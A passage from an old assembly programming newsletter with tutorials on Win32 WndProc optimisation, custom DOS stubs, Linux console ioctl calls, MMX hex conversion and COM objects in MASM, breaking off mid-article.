;map "A"-"Z"/"a"-"z" to 10-35, aborting on the one invalid value (040h)
;that won't get trapped in the next stage
;
         AND AL,0DFh
         SUB AL,037h
         CMP AL,0Ah
         JC SHORT ko2
;
;digit value checked that it is valid for the current radix
;this also weeds out previous invalid values (since they would be >35)
;jump out of loop is delayed so that EAX can be restored for exit
;
ko:     CMP AL,BL
         CMC
ko2:    XCHG EAX,ECX
         JC SHORT erriv
;
;accumulate the digit to the total. the total must be pre-multiplied.
;checks for overflow are done at both points so the routine can never
;generate false results
;
         MUL EBX
         JC errovr
         ADD EAX,ECX
         JNC lop
;
;overflow error
;   adjust SI index to current char and exit, note
;   that CF =1 already
;
errovr: DEC SI
         JMP SHORT don
;
;invalid character
;   main exit point, SI is adjusted to the current char
;   the CMP ensures that CF =0, and also that ZF =1 iff
;   no chars have been read
;
erriv:  DEC SI
         CMP SI,DI
;
;(restore registers and exit)
;
don:    POP DI
         POP ECX
         POP EBX
         POP EDX
         RET

scanu   ENDP

=========END OF CODE=======================================================



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                         WndProc, The Dirty Way
                                                         by X-Calibre of Diamond


I assume you all know what a WndProc is, and what you need it for. Let me
give you a quick example of a WndProc:

     WndProc   PROC hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
         .IF uMsg == WM_DESTROY
             INVOKE PostQuitMessage, NULL
         .ELSE
             INVOKE DefWindowProc, hWnd, uMsg, wParam, lParam
             ret
         .ENDIF
             xor   eax, eax
             ret
     WndProc   ENDP

This generates the following code:

     push  ebp                                   ; Create stack frame
     mov   ebp, esp                              ; Why does MASM use 'leave',
                                                 ; but not 'enter'?

     cmp   dword ptr [ebp+0C], WM_DESTROY        ; ebp+0C is uMsg
     jne   @@notDestroy

     push  NULL
     Call  PostQuitMessage
     jmp   @@exitFromDestroy

     @@notDestroy:
     push  [ebp+14]                              ; ebp+14 is lParam
     push  [ebp+10]                              ; ebp+10 is wParam
     push  [ebp+0C]                              ; ebp+0C is uMsg
     push  [ebp+08]                              ; ebp+08 is hWnd
     Call  DefWindowProcA                        ; Let Windows handle the other
                                                 ; messages

     leave                                       ; Remove stack frame
     ret   0010                                  ; Remove function arguments
                                                 ; from stack and return

     @@exitFromDestroy:
     xor   eax, eax                              ; Return 'FALSE'
     leave                                       ; Remove stack frame
     ret   0010                                  ; Remove function arguments
                                                 ; from stack and return

Looks nice, and works fine... But it builds a stack frame, even though we are
not using local variables. And if you code in a good fashion, there almost
never will be any... after all, this procedure is just a message handler, and
to keep your code tidy, you will not put all the code in here, but in separate
procedures, which you will call from here.

There's only one reason why MASM builds a stack frame for a function: the
function has a prototype for an HLL call. An HLL call uses the stack to
transfer its arguments.

So, all we have to do, is remove the prototype. That's easy: Just don't tell
MASM that this function uses any arguments.
This simple tweak will do the trick:

     WndProc   PROC
         ...
     WndProc   ENDP

The arguments will still be passed to the function, since that part of the
code is in the Windows kernel, and has not changed. Be careful though: Since
MASM does not know that there are arguments on the stack, it no longer cleans
up the stack. You have to specify that yourself.

Now we have a slight problem: How can we access the arguments now?
The answer is surprisingly easy: We create aliases for the addresses relative
to the stack pointer (esp). MASM does the same, except that it uses the base
pointer since it created a stack frame, and saved the original stack pointer
in ebp.
Knowing that Windows HLL calls always push the arguments in reverse order, and
that the return address is stored on the stack as well, we can devise these
indices for our parameters:

     hWnd    EQU    dword ptr [esp][4]
     uMsg    EQU    dword ptr [esp][8]
     wParam  EQU    dword ptr [esp][12]
     lParam  EQU    dword ptr [esp][16]

There, now we can refer to the arguments as usual.
There's 1 drawback however: Since the indices are relative to esp, they are
only valid when esp is not touched. In other words: Don't try to push or pop
anything and then use these arguments again. They can be used if you push some
variables, then pop them again before you access any of these arguments again,
because the stack pointer will be at the correct position again.

Let's say you need to use the stack again (eg. for an INVOKE), so the indices
will be invalidated. You might think that the only option then is to save the
stack pointer again, so we're back to the stack frame...
It's an option, but not the best one. Namely, ebp is a non-volatile register,
and needs to be saved and restored after use.
But there are more registers in the CPU. The volatile ones (eax, ecx and edx)
will not survive an API call, so how about using esi for example? Be aware
that Win32 expects a callback to preserve esi too, along with ebx, edi and
ebp, so this shortcut is only safe if nothing further up relies on it.

     WndProc   PROC
         mov   esi, esp
         hWnd    EQU    dword ptr [esi][4]
         uMsg    EQU    dword ptr [esi][8]
         wParam  EQU    dword ptr [esi][12]
         lParam  EQU    dword ptr [esi][16]

         ...
     WndProc   ENDP

And if you leave the stack as you found it (which should always be the case
with decent code), you don't even need to restore esp again.
If you got dirty and the stack still contains variables you don't want
anymore, then this is enough for a clean exit:

     WndProc   PROC
         ...
         mov   esp, esi
         ret   4 * sizeof dword      ; As I mentioned earlier, we have to clean
                                     ; the stack ourselves.
                                     ; We had 4 dword arguments, so this does
                                     ; the trick
     WndProc   ENDP

Still less code, and thus faster than the original. And just as rigid. You
have one register less to use during the WndProc, but as I said earlier, there
shouldn't be too much code here, so you should be able to spare the register.

Well, there's just 1 more thing that can be done with this tweaked WndProc.
Namely, if you leave the stack as you found it, the arguments for the
DefWindowProc are already in place, and the return address of our caller is
there too.
So basically we can just jump to it without any further ado. The resulting
WndProc that is equivalent to the original one will look like this then:

     WndProc   PROC
         hWnd    EQU    dword ptr [esp][4]
         uMsg    EQU    dword ptr [esp][8]
         wParam  EQU    dword ptr [esp][12]
         lParam  EQU    dword ptr [esp][16]

         .IF uMsg == WM_DESTROY
             INVOKE PostQuitMessage, NULL
         .ELSE
             jmp  DefWindowProc
         .ENDIF

         xor   eax, eax
         ret   4 * sizeof dword      ; Be sure to clean that stack!
     WndProc   ENDP

Yes, much shorter, and faster. Let's take a look at the generated code to get
a better understanding of how much shorter it actually is:

     cmp   dword ptr [esp+08], WM_DESTROY
     jne   @@noDestroy

     push  NULL
     Call  PostQuitMessage
     jmp   @@exitFromDestroy

     @@noDestroy:
     Jmp   DefWindowProcA

     @@exitFromDestroy:
     xor   eax, eax
     ret   0010

If you code it 'by hand' instead of with the .IF statement, there's another
tweak we can pull, but the rest looks great, doesn't it?

Of course these stunts can be applied to other procedures as well. Be careful,
and use them in good health.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                        Programming the DOS Stub
                                                         by X-Calibre of Diamond


As you may (or may not) know, there is a piece of DOS code still in every
Win32 executable file. This piece of code is referred to as the 'stub' and
ensures that the Win32 program won't cause a crash when run on a DOS system.
It just prints the familiar 'This program cannot be run in DOS mode' message and
exits.

'So what do we care?' you might ask... Well, Microsoft's linker provides the
option to link your own stub instead of the standard one. And, you must have
guessed it already by now: We can do it better than Microsoft!

So, how do we do this then?

Well, actually it's very simple: The first part of the Win32 executable is
literally a DOS file. There's just one small requirement: at offset 3Ch (60)
there is a DWORD specifying the start of the PE block relative to the start of
the file (the offset).

So basically you can just put any DOS EXE program in there, as long as you
make sure that there is room for the DWORD at offset 3Ch in the file. Usually
this is no problem, since the EXE header itself is usually quite big, and a
lot of the space is not being used. Microsoft's own stub has an empty header
mostly, and the code starts right after the DWORD, at offset 40h.
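
For those who want to poke at existing files, here is a small Python sketch
that reads that DWORD. The function name and the synthetic test image are my
own; the 'MZ' and 'PE' signatures it checks are the usual markers of DOS and
Win32 executables.

```python
import struct

def pe_header_offset(image: bytes) -> int:
    """Return the DWORD stored at offset 3Ch of an EXE image."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not a DOS EXE image")
    (offset,) = struct.unpack_from("<I", image, 0x3C)
    return offset

# Synthetic 64-byte stub followed by a PE signature, just for illustration.
stub = bytearray(0x40)
stub[0:2] = b"MZ"
struct.pack_into("<I", stub, 0x3C, 0x40)
image = bytes(stub) + b"PE\0\0"
print(hex(pe_header_offset(image)))
```

For a real file, pass in the bytes read from disk (opened in binary mode)
instead of the synthetic image.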

That's all fine and nice and whatever, but what can we do with this info?
Well, you could link in an entire DOS program for people not using Windows
(Look at REGEDIT.EXE in Windows 9x for an example). You could include a Fire
or Plasma effect when your program is run in DOS. You could create your own
'This program cannot be run in DOS mode' message. But, most importantly:
you can create smaller EXE files! That is one of the nicer applications of a
custom stub, and the one I'm going to explain a bit here.

What is the smallest size for the stub, theoretically speaking?

Well, considering the fact that at offset 60 there MUST be an offset pointing
to the PE header, the minimum size will be 60 bytes.
The actual stub file has to be 64 bytes, because of restrictions of Microsoft's
linker. But be sure not to use the last 4 bytes, since the linker will put in
the offset there.

Well, so in 60 bytes, you can't really do much. But just printing a small
warning for DOS users and then exiting is just about possible. Microsoft made
their version a little large: 120 bytes. So we can try to do just about the
same in 60 bytes.

We're going to use a little trick here, to get the program as small as 60
bytes. At offset 20h, there is room for a relocation table for the code. But
since we won't be needing them, we're going to put our code in there. This
is perfectly possible, because you can specify how many relocation table items
your program will be using. We just put in a 0 word at offset 6 in the header,
and the table is ours. Technically speaking, the code is still after the table.
The table just has a length of 0 bytes.

For all you non-DOS coders out there, this is what the program looks like:

;====================================================================stub.asm
.Model Tiny

.code
start:
     push cs      ; Point the data segment to the code segment, since
     pop  ds      ; we're putting the data after the code to save space.

     mov  dx, offset message ; Load pointer to the string for the call.
     mov  ah, 9              ; 9 is the print argument for int 21h.
     int  21h                ; The DOS interrupt.

     mov  ah, 4Ch            ; 4C is the exit argument for int 21h
     int  21h

; Put our string here
message db      "Windows prg!",0Dh,0Ah,'$'

; A little explanation may be required:
;
; 0Dh is the 'Carriage return' ASCII code.
; 0Ah is the 'Line feed' ASCII code.
; '$' is the string-terminator in DOS (like 0 is in Windows and other C based
; OSes)
end start
;=========================================================================EOF

The message can be 15 bytes at most, including the string terminator, since
the program itself starts at offset 32 in the file, and is 13 bytes long.
(32+13+15 = 60 bytes, so the last byte of the message sits at offset 59 and
the next byte will be used for the PE offset DWORD).
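
The byte budget can be checked by writing the opcodes out by hand. This is a
sketch in Python: the encodings are the usual 16-bit real-mode ones as I
would expect an assembler to emit them (they are not dumped from the enclosed
STUB.EXE), and the string offset assumes the message directly follows the
code.

```python
# Hand-assembled bytes for stub.asm (assumed encodings, see the note above).
code = bytes([
    0x0E,              # push cs
    0x1F,              # pop  ds
    0xBA, 0x0D, 0x00,  # mov  dx, offset message (message follows the code)
    0xB4, 0x09,        # mov  ah, 9
    0xCD, 0x21,        # int  21h
    0xB4, 0x4C,        # mov  ah, 4Ch
    0xCD, 0x21,        # int  21h
])
message = b"Windows prg!\r\n$"

HEADER_SIZE = 32        # minimal EXE header, so the code starts at offset 20h
PE_OFFSET_FIELD = 0x3C  # the DWORD the linker fills in

end = HEADER_SIZE + len(code) + len(message)
print(len(code), len(message), end)
assert end <= PE_OFFSET_FIELD, "stub would overwrite the PE offset DWORD"
```

Every extra byte of code has to come out of the message, since the total may
not grow past offset 3Ch.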

This version yields an undefined error code on exit. The error code is
specified in al when you call the exit DOS function. The errorcode actually
depends on the output in al of the int 21h call that prints the string. This
is of course undefined (actually it is 24h in Windows 98).

Microsoft's stub has a defined errorcode of 1. If you want to make your stub
100% the same, then you must replace the 'mov ah, 4Ch' with 'mov ax, 4C01h'.
Mind you, that this code is 1 byte longer, so your message can then be only 14
bytes long in total.

Since I'm never going to use the errorcode, I decided to save the byte and use
a larger string.

And that's that. Now you may run into trouble with the linker. I couldn't find
a linker that kept the EXE header to its minimum (which is 32 bytes). I used
TLINK, which made a 512 byte header. So I just edited the file manually, and
got it to its minimum size. A document explaining the EXE header format is
enclosed, and so is the STUB.EXE I made, and a small Win32 application using
it (with relocated PE header at 40h).
I will just briefly describe how the filesize is stored in the header, since
the document is not particularly clear there.

offset  length  description                             comments
----------------------------------------------------------------------
2       word    length of last used sector in file      modulo 512
4       word    size of file, incl. header              in 512-pages

The '512-pages' at offset 4 are (floppy) disk sectors. They are 512 bytes
each. So to calculate how many sectors your file will occupy, this formula
will suffice:

     sectors = CEILING(filesize/512)

CEILING means rounding up to the nearest whole number.

The length of the last used sector at offset 2 stores how many bytes are
occupied in the last sector of the file. Like the comment says, it's filesize
modulo 512.
In other words:

     lastusedsector = filesize - FLOOR(filesize/512)*512

The other way around is of course like this:

     filesize = (sectors - 1)*512 + lastusedsector

A little note here: Look at these 2 values in a program with the standard
Microsoft stub (eg. NOTEPAD.EXE).
We find these 2 values:

offset 2: 0090h
offset 4: 0003h

So the filesize is: (3 - 1)*512 + 144 = 1168
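
The two formulas are easy to try out in a few lines of Python. This is just a
sketch with function names of my own; it also assumes the usual convention
that a 0 at offset 2 means the last sector is completely full, which the
formulas above do not cover.

```python
PAGE = 512

def size_fields(filesize):
    """Return (lastusedsector, sectors) for a file of `filesize` bytes."""
    sectors = (filesize + PAGE - 1) // PAGE   # CEILING(filesize/512)
    lastusedsector = filesize % PAGE          # 0 is taken to mean "sector full"
    return lastusedsector, sectors

def file_size(lastusedsector, sectors):
    """Inverse of size_fields()."""
    if lastusedsector == 0:
        return sectors * PAGE
    return (sectors - 1) * PAGE + lastusedsector

print(file_size(0x0090, 0x0003))   # the two values found in NOTEPAD.EXE
print(size_fields(64))             # what a 64-byte stub should carry
```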

Now wait just a second! At offset 3Ch we find 00000080h...
So at offset 128 we find the PE header and the Windows program. Then how can
the DOS stub be 1168 bytes?

It can't!! Microsoft goofed up here... They have probably hand-edited the
EXE file they used for the stub like I did, and forgot to edit these values.
Luckily for them, this bug does no harm. But still...

Well, after we have created our DOS stub, all we have to do is link it in.
With Microsoft's linker it goes like this:

LINK code.obj /SUBSYSTEM:WINDOWS /STUB:STUB.EXE

And that's all you need!
You can ignore the warning the linker gives about the incomplete header. We
know that the program runs. The linker just doesn't consider EXE headers with
no relocation table (which could actually be considered a bug, since our EXE
header specifies that the table has length 0, and therefore the code can start
at offset 20h. The DOS EXE loader does interpret it correctly, so in fact, the
linker could be considered incompatible).

The only problem with Microsoft's linker is that it doesn't seem to want to
link the PE block right after the DOS stub. Maybe other linkers do, but I
haven't found one that does yet. Microsoft's linker just dumps some garbage,
and then puts its PE block at offset 78h. Maybe that is because their stub is
78h bytes long and they don't consider shorter stubs?
The offset at which the PE block is linked depends on the initial SP value
specified at offset 10h, actually (why is that?). It can also link at offset
80h or 88h.
You could move the PE block to offset 40h, and pad with 0's after the PE block,
using a hex-editor. This way it will compress even better, maybe. And you
could perhaps edit the PE block and move the code forward a bit too (there's a
great util in this. Shall we make it?).

Well, anyway... Have fun, and get crazy with your custom DOS stubs!

And remember:

DOS Knowledge is power!



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                                   Using ioctl()
                                                                      by mammon_


One of the most famous Unix maxims reads 'everything is a file'; directories
are files, pipes are files, hardware devices are files, even files are files.
This provides a transparent means of reading and writing hardware or software
constructs such as modems and sockets; yet the lack of interrupts or device
driver routines is sometimes confusing for those not used to Unix programming.
In linux, device parameters are manipulated through the character and block
'special file' interface by means of ioctl().

The ioctl() system call takes a file descriptor and a request type as its
primary arguments, along with an optional third argument referred to as "argp"
which contains any arguments that must be passed along with the request. The
possible ioctl() requests can be found by poking around in the $INCLUDE/asm and
$INCLUDE/linux header files, although a somewhat dated list of requests can be
viewed by typing 'man ioctl_list'.

One of the most useful devices to program with ioctl() for the applications
programmer will be the console; in linux terms, this consists of the keyboard
and display, such that all 63 of the Virtual Consoles can be controlled with
ioctl(). This can be useful if one wants to output debugging information to a
non-visible console, or to transfer STDIN and STDOUT to a newly-allocated
console while disabling virtual console switching, effectively tying the user
to a single console [e.g., in a walkup workstation].

Information on console ioctl requests can be found with 'man console_ioctl'.
Bringing up this man page instantly displays the following text:
        WARNING: If you use  the  following  information  you  are
        going to burn yourself.

        WARNING:  ioctl's are undocumented Linux internals, liable
        to be changed without warning.  Use POSIX functions.
This is ancient asm coderspeak meaning 'you are on the right track, keep going.'

Perusing the listed requests will provide enough information to code that first
exercise from DOS-ASM 1o1: generating a tone on the PC speaker.
        KDMKTONE
        Generate  tone  of  specified length.  The lower 16
        bits of argp specify the period  in  clock  cycles,
        and  the  upper  16 bits give the duration in msec.
        If the duration is zero, the sound is  turned  off.
        Control  returns  immediately.  For example, argp =
        (125<<16) + 0x637 would specify the  beep  normally
        associated  with  a  ctrl-G.   (Thus since 0.99pl1;
        broken in 2.1.49-50.)

This should not be too terribly hard to implement -- a call to open the file
descriptor, and a single call to ioctl() to sound the tone. First things first,
open() is called on /dev/tty to create a handle for the current console:
#-------------------------------------------------------------------beep.asm
%define O_RDWR 2 			 ;grep O_RDWR /usr/include/asm/*
%define KDMKTONE 0x4B30 	 ;grep KDMKTONE /usr/include/linux/*
EXTERN open
GLOBAL main

section .data
szTTY db '/dev/tty',0

section .text
main:
		   push dword O_RDWR
		   push dword szTTY
		   call open
		   add esp, 8
#--------------------------------------------------------------------BREAK

Next, calculate the frequency and duration of the tone to be played:
#---------------------------------------------------------------------CONT
		   mov dx, 666 	 ;duration
		   shl edx, 16
		   or dx, 1199 	 ;tone
#--------------------------------------------------------------------BREAK
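
The packing done in edx above can be double-checked with a quick Python
sketch. The helper names are mine, and the 1193180 Hz timer clock is an
assumption about the PC hardware (check your kernel headers); only the bit
layout comes from the man page.

```python
PIT_HZ = 1193180   # assumed PC timer clock, not taken from the man page

def tone_period(freq_hz):
    """Clock cycles per period for a tone of freq_hz."""
    return round(PIT_HZ / freq_hz)

def kdmktone_arg(duration_ms, period):
    """Upper 16 bits: duration in msec; lower 16 bits: period in clock cycles."""
    return ((duration_ms & 0xFFFF) << 16) | (period & 0xFFFF)

print(hex(kdmktone_arg(666, 1199)))              # the value beep.asm builds in edx
print(hex(kdmktone_arg(125, tone_period(750))))  # matches (125<<16) + 0x637
```

Under that clock assumption the 1199 used above works out to a tone of
roughly 995 Hz. From Python itself the value could be handed to
fcntl.ioctl(fd, 0x4B30, arg) with fd opened on /dev/tty, though that only
makes noise on a real console.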

Now, normally one might call ioctl as so:
		   push edx
		   push dword KDMKTONE
		   push eax
		   call ioctl
		   add esp, 12

However, ioctl is a systemcall, and we can save a bit of time by going
straight through the syscall gate at 0x80:
#---------------------------------------------------------------------CONT
		   mov ebx, eax
		   mov ecx, KDMKTONE
		   mov eax, 54 		 ;ioctl func defined in /usr/include/asm/unistd.h
		   int 0x80
		   ret
#----------------------------------------------------------------------EOF

So much for the simple beep. Another ASM 101 favorite is the 'blinking LED'
trick, where students learn to make the keyboard LEDs blink on and off in any
number of psychedelic patterns. A quick tour through the man page shows the
requests needed for this sample as well:

        KDGETLED
        Get state of LEDs.  argp points to a long int.  The
        lower  three  bits of *argp are set to the state of
        the LEDs, as follows:
            LED_CAP       0x04   caps lock led
            LED_NUM       0x02   num lock led
            LED_SCR       0x01   scroll lock led
        KDSETLED
        Set the LEDs.  The LEDs are set  to  correspond  to
        the lower three bits of argp.  However, if a higher
        order bit is set, the LEDs revert to  normal:  dis-
        playing the state of the keyboard functions of caps
        lock, num lock, and scroll lock.

The file descriptor must be opened as with the previous example. From there,
we must get the current LED state:
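#--------------------------------------------------------------------led.asm

%define KDGETLED        0x4B31         ;grep KDGETLED /usr/include/linux/*
%define KDSETLED        0x4B32         ;grep KDSETLED /usr/include/linux/*

section .bss
ledstate   resd 1                      ;KDGETLED stores the LED state here

section .text
		   mov ebx, eax          ;file descriptor returned by open()
		   mov edx, ledstate     ;argp must point to writable memory
		   mov ecx, KDGETLED
		   mov eax, 54           ;ioctl
		   int 0x80
		   mov edx, [ledstate]   ;load the LED bits for the code below
		   and edx, 0x07
#--------------------------------------------------------------------BREAK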

Next, all of the LEDs will be turned on and then off 10 times. It is vital
to the success of the algorithm that a delay be present between the off and
on transitions; otherwise the LEDs will appear to be steadily lit, and that
is much less of a programming achievement:
#---------------------------------------------------------------------CONT
		   mov ecx, 10
.here:
		   push ecx 				 ;save counter
		   or edx, 0x07 			 ;set all of 'em
		   mov ecx, KDSETLED
		   mov eax, 54
		   int 0x80

		   mov ecx, 0xFFFFFF 	 ;delay counter
.delay:
		   loop .delay

		   and edx, 0 			 ;turn all of them off
		   mov ecx, KDSETLED
		   mov eax, 54
		   int 0x80

		   mov ecx, 0xFFFFFF 	 ;next delay counter
.delay2:
		   loop .delay2

		   pop ecx
		   loop .here

		   ret
#----------------------------------------------------------------------EOF
Blinking the LEDs in succession and achieving hypnotic frequency via ioctl()
will be left as an exercise to the reader.

This should provide a quick introduction to using ioctl(). There are many more
possibilities available for scan codes, screen painting, and virtual console
control; further opportunities for console amusement exist also within the realm
of escape-sequence programming. The examples presented here can be compiled with
the standard
     nasm -f elf file.asm
     gcc -o file file.o
combination, or by using a Makefile:
#----------------------------------------------------------------------Makefile
#comments sit on their own lines: make keeps the blanks before a trailing '#'
#TARGET is the variable storing the base filename
TARGET = beep
#ASM contains the name of the assembler
ASM = nasm
#ASMFILE contains the full name of the source file
ASMFILE = $(TARGET).asm
#OBJFILE contains the full name of the object file
OBJFILE = $(TARGET).o
#LINKER contains the full name of the linker
LINKER = gcc
#LIBS contains any library flags
LIBS =
#LIBDIR contains any library location flags
LIBDIR =

#the 'all:' section applies to all targets
all:
	$(ASM) -o $(OBJFILE) -f elf $(ASMFILE)
	$(LINKER) -o $(TARGET) $(OBJFILE) $(LIBDIR) $(LIBS)
#---------------------------------------------------------------------------EOF
As with all Makefiles, with the target correctly set the source will be compiled
and linked simply by typing 'make' in the directory where the Makefile is
located.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
                                                                     BinToString
                                                            by Cecchinel Stephan


;Summary:       Converts a 32 bit number to an 8-byte string.
;Compatibility: MMX+
;Notes:         14 cycles. Input is stored in EAX; the output is a hex-format
;               character string pointed to by [EDI].
Sum1:     dd  0x30303030, 0x30303030
Mask1:    dd  0x0f0f0f0f, 0x0f0f0f0f
Comp1:    dd  0x09090909, 0x09090909
Hex32:
         bswap  eax
         movq  mm3,[Sum1]
         movq  mm4,[Comp1]
         movq  mm2,[Mask1]
         movq  mm5,mm3
         psubb  mm5,mm4
         movd  mm0,eax
         movq  mm1,mm0
         psrlq  mm0,4
         pand  mm0,mm2
         pand  mm1,mm2
         punpcklbw mm0,mm1
         movq  mm1,mm0
         pcmpgtb mm0,mm4
         pand  mm0,mm5
         paddb  mm1,mm3
         paddb  mm1,mm0
         movq  [edi],mm1
         ret
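
For readers without an MMX reference at hand, the per-nibble arithmetic of
the snippet can be followed in this Python sketch. It handles one nibble at a
time rather than eight in parallel, so it shows the idea and not the
instruction sequence; the function name is my own.

```python
def hex32(value):
    """Convert a 32-bit number to 8 lowercase hex characters."""
    out = []
    for shift in range(28, -4, -4):          # most significant nibble first
        nibble = (value >> shift) & 0x0F     # Mask1
        char = nibble + 0x30                 # Sum1: '0'..'9'
        if nibble > 0x09:                    # Comp1
            char += 0x30 - 0x09              # Sum1 - Comp1: skip to 'a'..'f'
        out.append(chr(char))
    return "".join(out)

print(hex32(0xDEADBEEF))
```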



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
                                                               Absolute Value
                                                               by Laura Fairhead


The Challenge
-------------
Find the absolute value of a register in only 4 bytes.

The Solution
------------

         NEG AX
         JL SHORT $-2       ; back to the NEG (displacement byte is -4)

This was not completely my original idea (is there such thing??); I
found a similar sequence which used the more obvious branch 'JS'. The
JS had the problem that it goes into an infinite loop if AX=08000h.
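
The difference between the two branches can be traced with a small Python
model of NEG and its flags. This is a sketch only: the helper names are mine,
and the loop is cut off after a few rounds so that the JS case returns
instead of hanging.

```python
def neg16(ax):
    """NEG AX: return (result, SF, OF) for a 16-bit value."""
    result = (-ax) & 0xFFFF
    sf = result >> 15                 # sign flag = top bit of the result
    of = int(ax == 0x8000)            # NEG overflows only for 8000h
    return result, sf, of

def abs16(ax, branch="JL"):
    """Repeat NEG AX while the branch is taken; give up after a few rounds."""
    for _ in range(4):
        ax, sf, of = neg16(ax)
        taken = (sf != of) if branch == "JL" else bool(sf)
        if not taken:
            return ax
    return None                       # still looping: the JS failure case

print(abs16(5), abs16(0xFFFB), hex(abs16(0x8000)), abs16(0x8000, "JS"))
```

JL tests SF against OF, so the overflow raised by negating 08000h is what
lets the loop fall through.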





::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.......................................................FIN

#13 From: "Michael Mondragon" <mammon_@...>
Date: Tue Sep 21, 1999 7:02 am
Subject: APJ Issue#5 July-Sep 99
 
______________________________________________________
::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                               July-Sep  99
:::\_____\::::::::::.                                              Issue      5
::::::::::::::::::::::.........................................................

             A S S E M B L Y   P R O G R A M M I N G   J O U R N A L
                       http://asmjournal.freeservers.com
                            asmjournal@...




T A B L E   O F   C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_

"COM in Assembly Part II"...................................Bill.Tyler

"How to use DirectDraw in ASM"...............................X-Calibre

"Writing Boot Sectors To Disk"...........................Jan.Verhoeven

"Dumping Memory to Disk".................................Jan.Verhoeven

"Formatted Numeric Output"..............................Laura.Fairhead

"Linked Lists in ASM"..........................................mammon_

Column: Win32 Assembly Programming
     "Structured Exception Handling under Win32"...........Chris.Dragan
     "Child Window Controls"...................................Iczelion
     "Dialog Box as Main Window"...............................Iczelion
     "Standardizing Win32 Callback Procedures"............Jeremy.Gordon

Column: The Unix World
     "Fire Demo ported to Linux SVGAlib".................Jan.Wagemakers

Column: Assembly Language Snippets
     "Abs".................................................Chris.Dragan
     "Min".................................................Chris.Dragan
     "Max".................................................Chris.Dragan
     "OBJECT"...................................................mammon_

Column: Issue Solution
     "Binary to ASCII"....................................Jan.Verhoeven

----------------------------------------------------------------------
        ++++++++++++++++++Issue  Challenge+++++++++++++++++
          Convert a bit value to ASCII in less than 10 bytes
----------------------------------------------------------------------



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                                      by mammon_


I suppose I should start with the good news. A week or so ago Hiroshimator
emailed me for the nth time asking if I needed help with the journal as I have
yet to get one out on time. I relented and asked if he knew any listservers;
one hour later he had an account for APJ set up at e-groups, specifically:
              http://www.egroups.com/group/apj-announce
One of the greatest obstacles to putting out these issues -- processing the
300 or so subscription requests that rack up between issues -- is now out of
the way for good.

The articles this month have somewhat of a high-level focus; with the COM and
DirectDraw articles by Bill Tyler and X-Calibre, respectively, as well as Chris
Dragan's classic work on exception handling and Jeremy Gordon's treatment of
windows callbacks, this issue is heavily weighted towards high-level win32
coding. Add to this Iczelion's two tutorials and my own win32-biased
linked list example, and it appears the DOS/Unix camp is losing ground.

To shore up the Unix front line, Jan Wagemakers has provided a port of last
month's fire demo to linux [GAS]. In addition, there are A86 articles by Jan
Verhoeven and a general assembly routine by Laura Fairhead to prove that not
all assembly has to be 32-bit.

And, finally, I am looking for a good 'challenge' columnist: someone to write
the monthly APJ challenges [and their solutions] so that I can start
announcing next month's challenge sooner than next month...

Now at last I can sleep ;)

_m


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                         COM in Assembly Part II
                                                                   by Bill Tyler


My previous article described how to use COM objects in your assembly
language programs.  It described only how to call COM methods, but not how to
create your own COM objects.  This article will describe how to do that.

This article will describe implementing COM Objects, using MASM syntax.  TASM
or NASM assemblers will not be considered, however the methods can be easily
applied to any assembler.

This article will also not describe some of the more advanced features of COM
such as reuse, threading, servers/clients, and so on.  These will be presented
in future articles.


COM Interfaces Review
------------------------------------------------------------------------------
An interface definition specifies the interface's methods, their return types,
the number and types of their parameters, and what the methods must do.  Here
is a sample interface definition:

IInterface struct
     lpVtbl  dd  ?
IInterface ends

IInterfaceVtbl struct
     ; IUnknown methods
     STDMETHOD       QueryInterface, :DWORD, :DWORD, :DWORD
     STDMETHOD       AddRef, :DWORD
     STDMETHOD       Release, :DWORD
     ; IInterface methods
     STDMETHOD       Method1, :DWORD
     STDMETHOD       Method2, :DWORD
IInterfaceVtbl ends

STDMETHOD is used to simplify the interface declaration, and is defined as:

STDMETHOD MACRO name, argl :VARARG
     LOCAL @tmp_a
     LOCAL @tmp_b
     @tmp_a TYPEDEF PROTO argl
     @tmp_b TYPEDEF PTR @tmp_a
     name @tmp_b ?
ENDM

Besides shortening the declarations, the macro gives every member a typed
prototype, so that the MASM invoke syntax can be used. (Macro originally by
Ewald :)

Access to the interface's methods occurs through a pointer.  This pointer
points to a table of function pointers, called a vtable. Here is a sample
method call:

mov     eax, [lpif]                            ; lpif is the interface pointer
mov     eax, [eax]                             ; get the address of the vtable
invoke  (IInterfaceVtbl [eax]).Method1, [lpif] ; indirect call to the function
- or -
invoke  [eax][IInterfaceVtbl.Method2], [lpif]  ; alternate notation

Two different styles of addressing the members are shown.  Both notations
produce equivalent code, so the method used is a matter of personal
preference.

All interfaces must inherit from the IUnknown interface.  This means that the
first 3 methods of the vtable must be QueryInterface, AddRef, and Release.
The purpose and implementation of these methods will be discussed later.


GUIDS
------------------------------------------------------------------------------
A GUID is a Globally Unique ID.  A GUID is a 16-byte number, that is unique
to an interface.  COM uses GUID's to identify different interfaces from one
another.  Using this method prevents name clashing as well as version
clashing.  To get a GUID, you use a generator utility that is included with
most win32 development packages.

A GUID is represented by the following structure:

GUID STRUCT
